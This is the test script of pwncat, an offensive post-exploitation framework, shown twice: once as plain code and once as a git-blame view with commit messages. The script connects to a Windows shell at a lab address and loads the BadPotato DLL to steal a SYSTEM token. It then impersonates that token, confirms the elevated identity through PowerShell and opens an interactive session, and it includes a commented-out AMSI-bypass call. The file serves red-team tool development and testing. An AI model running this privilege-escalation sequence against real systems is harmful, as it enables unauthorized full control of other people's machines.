pwncat/test.py

#!./env/bin/python
import json
import stat
import time
import subprocess

import pwncat.manager
import pwncat.platform.windows

# Create a manager
with pwncat.manager.Manager("data/pwncatrc") as manager:

    # Tell the manager to create verbose sessions that
    # log all commands executed on the remote host
    # manager.config.set("verbose", True, glob=True)

    # Establish a session
    # session = manager.create_session("windows", host="192.168.56.10", port=4444)
    session = manager.create_session("windows", host="192.168.122.11", port=4444)
    # session = manager.create_session("linux", host="pwncat-ubuntu", port=4444)
    # session = manager.create_session("linux", host="127.0.0.1", port=4445)

    # session.platform.powershell("amsiutils")

    try:
        # Load the BadPotato plugin
        session.log("leaking system token w/ BadPotato")
        badpotato = session.platform.dotnet_load("BadPotato.dll")

        # Call the method within the DLL to leak a system token
        system_token = badpotato.get_system_token()
        session.log(f"found system token: {system_token}")
        session.log("impersonating token...")

        # Impersonate the SYSTEM token
        session.platform.impersonate(system_token)

        # Checkout our active user through powershell
        result = session.platform.powershell(
            "[System.Security.Principal.WindowsIdentity]::GetCurrent().Name"
        )
        session.log(f"now running as: {result[0]}")

        session.platform.refresh_uid()

        session.log(session.platform.getuid())
        session.log(session.find_user(uid=session.platform.getuid()))

    except (
        pwncat.platform.windows.ProtocolError,
        pwncat.platform.windows.PowershellError,
    ) as exc:
        session.log(f"badpotato failed: {exc}")

    manager.interactive()
Preliminary windows platform support. 2020-12-30 05:36:54 +00:00			`#!./env/bin/python`
Added windows local user and group enumeration Also added markdown table generator/jinja filter for report generation. This is currentl the best I can do since commonmark (and therefore rich) doesn't support tables at the moment. :sob: 2021-05-25 06:05:23 +00:00			`import json`
			`import stat`
			`import time`
Semi-working windows C2 2021-01-03 23:22:17 +00:00			`import subprocess`

Preliminary windows platform support. 2020-12-30 05:36:54 +00:00			`import pwncat.manager`
Semi-working windows C2 2021-01-03 23:22:17 +00:00			`import pwncat.platform.windows`
Preliminary windows platform support. 2020-12-30 05:36:54 +00:00
			`# Create a manager`
Added windows local user and group enumeration Also added markdown table generator/jinja filter for report generation. This is currentl the best I can do since commonmark (and therefore rich) doesn't support tables at the moment. :sob: 2021-05-25 06:05:23 +00:00			`with pwncat.manager.Manager("data/pwncatrc") as manager:`
Preliminary windows platform support. 2020-12-30 05:36:54 +00:00
Added windows local user and group enumeration Also added markdown table generator/jinja filter for report generation. This is currentl the best I can do since commonmark (and therefore rich) doesn't support tables at the moment. :sob: 2021-05-25 06:05:23 +00:00			`# Tell the manager to create verbose sessions that`
			`# log all commands executed on the remote host`
			`# manager.config.set("verbose", True, glob=True)`
Initial work on automated testing 2021-04-10 19:52:47 +00:00
Added windows local user and group enumeration Also added markdown table generator/jinja filter for report generation. This is currentl the best I can do since commonmark (and therefore rich) doesn't support tables at the moment. :sob: 2021-05-25 06:05:23 +00:00			`# Establish a session`
			`# session = manager.create_session("windows", host="192.168.56.10", port=4444)`
Updated C2 version and Windows.abspath Windows.abspath used to cause a FileNotFoundError when the file did not exist. It now correctly resolves relative paths for files which don't yet exist. 2021-06-08 18:33:14 +00:00			`session = manager.create_session("windows", host="192.168.122.11", port=4444)`
Added windows local user and group enumeration Also added markdown table generator/jinja filter for report generation. This is currentl the best I can do since commonmark (and therefore rich) doesn't support tables at the moment. :sob: 2021-05-25 06:05:23 +00:00			`# session = manager.create_session("linux", host="pwncat-ubuntu", port=4444)`
Updated C2 version and Windows.abspath Windows.abspath used to cause a FileNotFoundError when the file did not exist. It now correctly resolves relative paths for files which don't yet exist. 2021-06-08 18:33:14 +00:00			`# session = manager.create_session("linux", host="127.0.0.1", port=4445)`
Windows loader and stagetwo working. 2021-01-10 23:01:08 +00:00
Cleaned up plugin system - Added builtin plugin resolver - Rolled base c2 dlls into plugin resolver - Changed plugin location configuration from `windows_c2_dir` to `plugin_path` 2021-06-12 07:10:14 +00:00			`# session.platform.powershell("amsiutils")`

			`try:`
			`# Load the BadPotato plugin`
			`session.log("leaking system token w/ BadPotato")`
			`badpotato = session.platform.dotnet_load("BadPotato.dll")`

			`# Call the method within the DLL to leak a system token`
			`system_token = badpotato.get_system_token()`
			`session.log(f"found system token: {system_token}")`
			`session.log("impersonating token...")`

			`# Impersonate the SYSTEM token`
			`session.platform.impersonate(system_token)`

			`# Checkout our active user through powershell`
			`result = session.platform.powershell(`
			`"[System.Security.Principal.WindowsIdentity]::GetCurrent().Name"`
			`)`
			`session.log(f"now running as: {result[0]}")`

			`session.platform.refresh_uid()`

			`session.log(session.platform.getuid())`
			`session.log(session.find_user(uid=session.platform.getuid()))`

			`except (`
			`pwncat.platform.windows.ProtocolError,`
			`pwncat.platform.windows.PowershellError,`
			`) as exc:`
			`session.log(f"badpotato failed: {exc}")`

			`manager.interactive()`